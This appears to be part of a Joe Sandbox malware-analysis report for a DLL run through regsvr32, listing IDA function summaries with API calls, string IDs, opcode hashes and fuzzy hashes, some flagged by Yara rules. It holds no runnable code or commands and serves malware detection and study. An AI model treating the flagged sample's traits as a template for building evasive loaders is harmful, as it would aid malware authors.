                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Sleep_errno
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1068366078-0
                                                                                                                                      • Opcode ID: 99b9e4cc6464749d47a71fc1b610823d805388b9272814145126b07a25ab941d
                                                                                                                                      • Instruction ID: de9d4bc650a807fdb793c2dc0de5a8422e443eef6756a399501deb6849d21299
                                                                                                                                      • Opcode Fuzzy Hash: 99b9e4cc6464749d47a71fc1b610823d805388b9272814145126b07a25ab941d
                                                                                                                                      • Instruction Fuzzy Hash: 1B01A233E24B818AEB549B16A800129B7E5FBD8FD0F580172DE5D53B50EF78E892CB05
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 00007FFFE2316C34: _FF_MSGBANNER.LIBCMT ref: 00007FFFE2316C64
                                                                                                                                        • Part of subcall function 00007FFFE2316C34: RtlAllocateHeap.NTDLL(?,?,00000000,00007FFFE23130C0,?,?,00000000,00007FFFE2316B19,?,?,00000000,00007FFFE2316BC3), ref: 00007FFFE2316C89
                                                                                                                                        • Part of subcall function 00007FFFE2316C34: _errno.LIBCMT ref: 00007FFFE2316CAD
                                                                                                                                        • Part of subcall function 00007FFFE2316C34: _errno.LIBCMT ref: 00007FFFE2316CB8
                                                                                                                                      • Sleep.KERNEL32(?,?,00000000,00007FFFE2316B19,?,?,00000000,00007FFFE2316BC3,?,?,?,?,?,?,00000000,00007FFFE2312DC8), ref: 00007FFFE23130D2
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _errno$AllocateHeapSleep
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4153772858-0
                                                                                                                                      • Opcode ID: fda341601c3db2866e613cad0830f714017b4f3b234a5a25ccfa8741b4d7d732
                                                                                                                                      • Instruction ID: 89656d47d8e7c503df33f1815f257122a26b7968a21b80d5cf500f787a99e3e8
                                                                                                                                      • Opcode Fuzzy Hash: fda341601c3db2866e613cad0830f714017b4f3b234a5a25ccfa8741b4d7d732
                                                                                                                                      • Instruction Fuzzy Hash: DFF02232E097858AEA109F12A44022DB2E0FBE4B90F540175EA5E93755EF7CE892CF02
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: String$free$ByteCharMultiWide$ErrorLast
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1446610345-0
                                                                                                                                      • Opcode ID: 1cb68e5ebb75471bd28e921dddda68db4bd0a605ea05e1978d1bd0bd9315b2d8
                                                                                                                                      • Instruction ID: e277a75df3c8e2ef7556c84d75d5d4db6f2704a11025cf8093d6250e04a756d6
                                                                                                                                      • Opcode Fuzzy Hash: 1cb68e5ebb75471bd28e921dddda68db4bd0a605ea05e1978d1bd0bd9315b2d8
                                                                                                                                      • Instruction Fuzzy Hash: DBF11632E096458EF7208F24D4002A977D1FBA4B98F5442B6DA1DA7FD4EFBCE9418B05
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DecodeErrorLastPointer_errno$AddressLibraryLoadProc
                                                                                                                                      • String ID: ADVAPI32.DLL$SystemFunction036
                                                                                                                                      • API String ID: 1558914745-1064046199
                                                                                                                                      • Opcode ID: a4bc4b26b88413057c65bce35d9d543f8071dd4b5a3168f49804b7622c4c0c09
                                                                                                                                      • Instruction ID: 387fc25c4dfffeb87468a055166e4e0b8ce435327179a1a3f4ad509c6b9b4155
                                                                                                                                      • Opcode Fuzzy Hash: a4bc4b26b88413057c65bce35d9d543f8071dd4b5a3168f49804b7622c4c0c09
                                                                                                                                      • Instruction Fuzzy Hash: BF317421E086528EFB20AF65A81537963D0AFA4780F5444B6DE0DE7796FFBCE4158F02
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Locale$InfoValid$CodeDefaultPageUser_getptd_itow_s
                                                                                                                                      • String ID: Norwegian-Nynorsk
                                                                                                                                      • API String ID: 2273835618-461349085
                                                                                                                                      • Opcode ID: 27b601e54d08442215230f85cfe0824a991ba4f10c2dcca786a022abe7f281d3
                                                                                                                                      • Instruction ID: 0ff8a091b1abba6eb9c354248d57986c01ada92ab8e6a9c44e59faa58346dc77
                                                                                                                                      • Opcode Fuzzy Hash: 27b601e54d08442215230f85cfe0824a991ba4f10c2dcca786a022abe7f281d3
                                                                                                                                      • Instruction Fuzzy Hash: 8E615362E0876249FB659F21D40137923D0EB64B44F0885B7CA4DE62D4EFBCE940CB07
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FormatTime$__ascii_stricmpfree
                                                                                                                                      • String ID: a/p$am/pm
                                                                                                                                      • API String ID: 2252689280-3206640213
                                                                                                                                      • Opcode ID: f0a1e010cfc2bba628f50de28a03b415369789bd89755694daa0cdadb7c0128b
                                                                                                                                      • Instruction ID: e36ff9dec5e7884ebbf8e881b167c09e50e882fe723c5f79645a590234af2f8b
                                                                                                                                      • Opcode Fuzzy Hash: f0a1e010cfc2bba628f50de28a03b415369789bd89755694daa0cdadb7c0128b
                                                                                                                                      • Instruction Fuzzy Hash: DDF1CA22D1C6928DE7648F24845037C67E2FF24784F4491B3EA4FE7A85EE7CA855CB02
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • GetModuleFileNameA.KERNEL32(?,?,?,?,?,00007FFFE2317194,?,?,?,?,00007FFFE2316C69,?,?,00000000,00007FFFE23130C0), ref: 00007FFFE2316FCF
                                                                                                                                      • GetStdHandle.KERNEL32(?,?,?,?,?,00007FFFE2317194,?,?,?,?,00007FFFE2316C69,?,?,00000000,00007FFFE23130C0), ref: 00007FFFE23170DB
                                                                                                                                      • WriteFile.KERNEL32 ref: 00007FFFE2317115
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File$HandleModuleNameWrite
                                                                                                                                      • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                                                      • API String ID: 3784150691-4022980321
                                                                                                                                      • Opcode ID: a3f87b8c5f367064f797f5b9ceb23e0cb6ebb80f3dcd78d3f9f2145c33283283
                                                                                                                                      • Instruction ID: f0d703056609d1f6cf06ec6f2d4bcfe17e6db6856c3ae8c3d2c3f99a3e3a9388
                                                                                                                                      • Opcode Fuzzy Hash: a3f87b8c5f367064f797f5b9ceb23e0cb6ebb80f3dcd78d3f9f2145c33283283
                                                                                                                                      • Instruction Fuzzy Hash: 7E51F022F1874349FB24DB25A8557BA22D1BFA4380F4441B7DD0DE6AD6EFBCE1058E02
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3778485334-0
                                                                                                                                      • Opcode ID: 44244c45948aa76910f1429c67e23cf948153936c8457040e3babb9890c0c3d8
                                                                                                                                      • Instruction ID: 51b7b47151e939e3a132a8e4ab956e540f5d9c43b6e4f2257707a5161076f2a0
                                                                                                                                      • Opcode Fuzzy Hash: 44244c45948aa76910f1429c67e23cf948153936c8457040e3babb9890c0c3d8
                                                                                                                                      • Instruction Fuzzy Hash: 5F31D736D08B4689E7609B50F84136973E0FFA4744F5041B6DA8DA2769EFBCE059CF02
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • _lock.LIBCMT ref: 00007FFFE231E6EB
                                                                                                                                      • free.LIBCMT ref: 00007FFFE231E7E2
                                                                                                                                        • Part of subcall function 00007FFFE2313024: HeapFree.KERNEL32(?,?,00000000,00007FFFE2312DDC,?,?,?,00007FFFE2312DFF,?,?,?,00007FFFE231254F,?,?,?,00007FFFE231262A), ref: 00007FFFE231303A
                                                                                                                                        • Part of subcall function 00007FFFE2313024: _errno.LIBCMT ref: 00007FFFE2313044
                                                                                                                                        • Part of subcall function 00007FFFE2313024: GetLastError.KERNEL32(?,?,00000000,00007FFFE2312DDC,?,?,?,00007FFFE2312DFF,?,?,?,00007FFFE231254F,?,?,?,00007FFFE231262A), ref: 00007FFFE231304C
                                                                                                                                      • ___lc_codepage_func.LIBCMT ref: 00007FFFE231E76B
                                                                                                                                        • Part of subcall function 00007FFFE2316550: RtlCaptureContext.KERNEL32 ref: 00007FFFE231658F
                                                                                                                                        • Part of subcall function 00007FFFE2316550: IsDebuggerPresent.KERNEL32 ref: 00007FFFE231662D
                                                                                                                                        • Part of subcall function 00007FFFE2316550: SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFFE2316637
                                                                                                                                        • Part of subcall function 00007FFFE2316550: UnhandledExceptionFilter.KERNEL32 ref: 00007FFFE2316642
                                                                                                                                        • Part of subcall function 00007FFFE2316550: GetCurrentProcess.KERNEL32 ref: 00007FFFE2316658
                                                                                                                                        • Part of subcall function 00007FFFE2316550: TerminateProcess.KERNEL32 ref: 00007FFFE2316666
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _errno$ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerErrorFreeHeapLastPresentTerminate___lc_codepage_func_lockfree
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 178205154-0
                                                                                                                                      • Opcode ID: 74de64cbd29ae749c01db9c906a5c8058d145dff36747eda2fd1744b72fc25a1
                                                                                                                                      • Instruction ID: b755e76409b2f3ac4f555f5d5147fea03870e9f024d386107af7d6d11ca3e2dd
                                                                                                                                      • Opcode Fuzzy Hash: 74de64cbd29ae749c01db9c906a5c8058d145dff36747eda2fd1744b72fc25a1
                                                                                                                                      • Instruction Fuzzy Hash: D7D1B232E0C2828DE7209F24945077977D2BBA5740F4441B3DA8DB7696EFBDE8518F02
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFFE231E1C2), ref: 00007FFFE231DFF2
                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFFE231E1C2), ref: 00007FFFE231E004
                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFFE231E1C2), ref: 00007FFFE231E04F
                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFFE231E1C2), ref: 00007FFFE231E0E1
                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFFE231E1C2), ref: 00007FFFE231E11B
                                                                                                                                      • free.LIBCMT ref: 00007FFFE231E12F
                                                                                                                                        • Part of subcall function 00007FFFE2316C34: _FF_MSGBANNER.LIBCMT ref: 00007FFFE2316C64
                                                                                                                                        • Part of subcall function 00007FFFE2316C34: RtlAllocateHeap.NTDLL(?,?,00000000,00007FFFE23130C0,?,?,00000000,00007FFFE2316B19,?,?,00000000,00007FFFE2316BC3), ref: 00007FFFE2316C89
                                                                                                                                        • Part of subcall function 00007FFFE2316C34: _errno.LIBCMT ref: 00007FFFE2316CAD
                                                                                                                                        • Part of subcall function 00007FFFE2316C34: _errno.LIBCMT ref: 00007FFFE2316CB8
                                                                                                                                      • GetLocaleInfoA.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFFE231E1C2), ref: 00007FFFE231E145
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InfoLocale$_errno$AllocateByteCharErrorHeapLastMultiWidefree
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2309262205-0
                                                                                                                                      • Opcode ID: 71a04b091aa06e394b105ea5eb29500c7d2471e259f2c6ae1c50144f40b044a4
                                                                                                                                      • Instruction ID: 9812a29ac36cebd599381b40a70db8fbf12254a6292dedb19a1e22e794a008e4
                                                                                                                                      • Opcode Fuzzy Hash: 71a04b091aa06e394b105ea5eb29500c7d2471e259f2c6ae1c50144f40b044a4
                                                                                                                                      • Instruction Fuzzy Hash: DD51B532E086428EE7649F21D84067963D2FB647A4F544177DA1EA3BD4EFBDE4418B01
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _errno$DecodePointer_lock
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2175075375-0
                                                                                                                                      • Opcode ID: e83d4e1a308f3a4c606242a395cb5e969118d697d0d9f70e8103cd5b86654c3e
                                                                                                                                      • Instruction ID: c941bed0f130b4429802842fa9dc591a605585889e65ed16ee168d6773fc163e
                                                                                                                                      • Opcode Fuzzy Hash: e83d4e1a308f3a4c606242a395cb5e969118d697d0d9f70e8103cd5b86654c3e
                                                                                                                                      • Instruction Fuzzy Hash: 4B31A526F0870246F7159A61945177A62D1AF64780F148177DF0CABB8BFFBCD4118F02
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1269745586-0
                                                                                                                                      • Opcode ID: 4b9ca92828b1b5c60ed307038ce46a3bf90eb6ca82a158dafa7f71ad6e682487
                                                                                                                                      • Instruction ID: 53d53acb90213f68daabd9b3fb4e29c70d00c3224d238e3de35a895d6d23028b
                                                                                                                                      • Opcode Fuzzy Hash: 4b9ca92828b1b5c60ed307038ce46a3bf90eb6ca82a158dafa7f71ad6e682487
                                                                                                                                      • Instruction Fuzzy Hash: 7C311072A08B8686DB248B54F4403AEB3A0FBE4744F504176DB8D93A59EFBCD149CF01
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: "+H$1l7.$M8;$]$d$]k$]k$94
                                                                                                                                      • API String ID: 0-2447245168
                                                                                                                                      • Opcode ID: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
                                                                                                                                      • Instruction ID: 1221e244f5383d3e6569bf50eb566ee92e7d288cf12f4405919b94e37960c7a7
                                                                                                                                      • Opcode Fuzzy Hash: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
                                                                                                                                      • Instruction Fuzzy Hash: 3FB10D7160130CCBDBA9DF28C18A6DA3BE1FF48748F114129FD1A97261D774E919CB46
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InfoLocale
                                                                                                                                      • String ID: ACP$OCP
                                                                                                                                      • API String ID: 2299586839-711371036
                                                                                                                                      • Opcode ID: 388ed1ec509bc17a1b1080bf0c7b12a90c89964bfa9f21f0ca41505682e31820
                                                                                                                                      • Instruction ID: 1000e4d0d829ebd22df1409352c4b696ed6cc7ad48b9d4dfa1d02c336099ee42
                                                                                                                                      • Opcode Fuzzy Hash: 388ed1ec509bc17a1b1080bf0c7b12a90c89964bfa9f21f0ca41505682e31820
                                                                                                                                      • Instruction Fuzzy Hash: 67219F22E4865389FB60CB20E8103B963E0AFA4784F444972CA4DE3595FFACE546CF03
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 1h$I-$IY$QL&$li7$o
                                                                                                                                      • API String ID: 0-890095520
                                                                                                                                      • Opcode ID: d92cde7f9b8773e82faae5f21764c68a430e9ac7962d305d8d3ec3a014b69236
                                                                                                                                      • Instruction ID: 3309774e0679b3a301b7d0c809474a48ec240f33eb9a68417431e078f6a2137f
                                                                                                                                      • Opcode Fuzzy Hash: d92cde7f9b8773e82faae5f21764c68a430e9ac7962d305d8d3ec3a014b69236
                                                                                                                                      • Instruction Fuzzy Hash: 72921875604BC88BCBB8DF24DC85BDD7BE0FB86305F20561DD85E9AA60CBB85645CB02
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 1$ {,$"$$-%$Rku$ i
                                                                                                                                      • API String ID: 0-1845893065
                                                                                                                                      • Opcode ID: 8a8483899f0d6f446eebdfc8e7bf7c7542960c12dc616770c4deeefd42d211ba
                                                                                                                                      • Instruction ID: cb6ea2ed9b9de3b3effb5fe074f3157ffd1060f729125c5012da7c2884d2f589
                                                                                                                                      • Opcode Fuzzy Hash: 8a8483899f0d6f446eebdfc8e7bf7c7542960c12dc616770c4deeefd42d211ba
                                                                                                                                      • Instruction Fuzzy Hash: EB52D470544BCA8BCBB8CF24CC85BEF7BA0FB44306F155529D89A8A291DBB85749CF41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: VUS/$YV~$p$@$EX$OX
                                                                                                                                      • API String ID: 0-2743166816
                                                                                                                                      • Opcode ID: 42abff069bb8dd677487b4024391c19b5d6520d96b7057ef658f077a6ca5f53c
                                                                                                                                      • Instruction ID: 6ceb6cba6b0314249f0ec67deadc173c496f62a90fe3cec01f017443767c42d8
                                                                                                                                      • Opcode Fuzzy Hash: 42abff069bb8dd677487b4024391c19b5d6520d96b7057ef658f077a6ca5f53c
                                                                                                                                      • Instruction Fuzzy Hash: BD3213711097848FD3A9CF68C58A65BBBF0FBCA744F104A1DF68687260C7B6D949CB42
